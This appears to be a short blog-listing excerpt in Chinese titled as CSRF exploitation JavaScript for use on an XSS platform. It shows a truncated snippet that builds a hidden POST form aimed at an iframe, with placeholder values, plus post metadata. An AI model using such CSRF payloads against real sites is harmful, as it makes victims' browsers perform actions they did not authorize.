CSRF利用js后台加载(可直接放在xss平台上使用)
// 构造form表单
var frm = document.createElement('form');
frm.action = 'url';
frm.method = 'post';
frm.target = 'iframe';
//设置参数
var i1 = document.createElement('input');
i1.name = '';
i1.value = '';
// 把...
原创
2019-09-02 09:34:37 ·
392 阅读 ·
0 评论